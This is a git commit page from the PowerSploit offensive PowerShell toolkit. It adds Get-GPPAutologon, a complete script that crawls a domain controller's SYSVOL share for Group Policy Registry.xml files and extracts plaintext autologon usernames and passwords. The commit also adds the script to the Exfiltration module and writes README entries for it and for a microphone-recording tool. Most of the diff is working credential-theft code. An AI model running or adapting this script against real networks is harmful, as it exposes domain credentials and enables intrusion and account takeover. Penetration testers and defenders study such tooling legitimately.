diff options
| author | Oddvar Moe <oddvar.moe@advania.no> | 2016-11-21 20:16:02 +0100 |
|---|---|---|
| committer | Oddvar Moe <oddvar.moe@advania.no> | 2016-11-21 20:16:02 +0100 |
| commit | de955ef270e9ba5073038e035f00da696cb9688c (patch) | |
| tree | 94a989212f96a1de5725247059295fff9f87c3e6 | |
| parent | 262a260865d408808ab332f972d410d3b861eff1 (diff) | |
| download | PowerSploit-de955ef270e9ba5073038e035f00da696cb9688c.tar.gz PowerSploit-de955ef270e9ba5073038e035f00da696cb9688c.zip | |
Added Get-GPPAutologon.ps1
| -rw-r--r-- | Exfiltration/Exfiltration.psd1 | 3 | ||||
| -rw-r--r-- | Exfiltration/Get-GPPAutologon.ps1 | 139 | ||||
| -rw-r--r-- | README.md | 8 |
3 files changed, 149 insertions, 1 deletions
diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1 index da78493..a8cc113 100644 --- a/Exfiltration/Exfiltration.psd1 +++ b/Exfiltration/Exfiltration.psd1 @@ -31,6 +31,7 @@ FunctionsToExport = '*' FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1',
'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1',
- 'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml'
+ 'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml',
+ 'Get-MicrophoneAudio.ps1', 'Get-GPPAutologon.ps1'
}
diff --git a/Exfiltration/Get-GPPAutologon.ps1 b/Exfiltration/Get-GPPAutologon.ps1 new file mode 100644 index 0000000..fd8978f --- /dev/null +++ b/Exfiltration/Get-GPPAutologon.ps1 @@ -0,0 +1,139 @@ +function Get-GPPAutologon +{ +<# +.SYNOPSIS + + Retrieves password from Autologon entries that are pushed through Group Policy Registry Preferences. + + PowerSploit Function: Get-GPPAutologon + Author: Oddvar Moe (@oddvarmoe) + Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work! + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + +.DESCRIPTION + + Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password. + +.EXAMPLE + + PS C:\> Get-GPPAutolgon + + UserNames File Passwords + --------- ---- --------- + {administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3} + {NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword} + + +.EXAMPLE + + PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq + + password + password12 + password123 + password1234 + password1234$ + read123 + Recycling*3ftw! + +.LINK + + https://support.microsoft.com/nb-no/kb/324737 +#> + + [CmdletBinding()] + Param () + + #Some XML issues between versions + Set-StrictMode -Version 2 + + #define helper function to parse fields from xml files + function Get-GPPInnerFields + { + [CmdletBinding()] + Param ( + $File + ) + + try + { + $Filename = Split-Path $File -Leaf + [xml] $Xml = Get-Content ($File) + + #declare empty arrays + $Password = @() + $UserName = @() + + #check for password and username field + if (($Xml.innerxml -like "*DefaultPassword*") -and ($Xml.innerxml -like "*DefaultUserName*")) + { + $props = $xml.GetElementsByTagName("Properties") + foreach($prop in $props) + { + switch ($prop.name) + { + 'DefaultPassword' + { + $Password += , $prop | Select-Object -ExpandProperty Value + } + + 'DefaultUsername' + { + $Username += , $prop | Select-Object -ExpandProperty Value + } + } + + Write-Verbose "Potential password in $File" + } + + #put [BLANK] in variables + if (!($Password)) + { + $Password = '[BLANK]' + } + + if (!($UserName)) + { + $UserName = '[BLANK]' + } + + #Create custom object to output results + $ObjectProperties = @{'Passwords' = $Password; + 'UserNames' = $UserName; + 'File' = $File} + + $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties + Write-Verbose "The password is between {} and may be more than one value." + if ($ResultsObject) + { + Return $ResultsObject + } + } + } + catch {Write-Error $Error[0]} + } + + try { + #ensure that machine is domain joined and script is running as a domain account + if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) { + throw 'Machine is not a domain member or User is not a member of the domain.' + } + + #discover potential registry.xml containing autologon passwords + Write-Verbose 'Searching the DC. This could take a while.' + $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml' + + if ( -not $XMlFiles ) {throw 'No preference files found.'} + + Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords." + + foreach ($File in $XMLFiles) { + $Result = (Get-GppInnerFields $File.Fullname) + Write-Output $Result + } + } + + catch {Write-Error $Error[0]} +}
\ No newline at end of file @@ -100,6 +100,10 @@ Logs keys pressed, time and the active window. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. +#### `Get-GPPAutologon` + +Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences. + #### `Get-TimedScreenshot` A function that takes screenshots at a regular interval and saves them to a folder. @@ -128,6 +132,10 @@ Displays Windows vault credential objects including cleartext web credentials. Generates a full-memory minidump of a process. +#### 'Get-MicrophoneAudio' + +Records audio from system microphone and saves to disk + ## Mayhem **Cause general mayhem with PowerShell.** |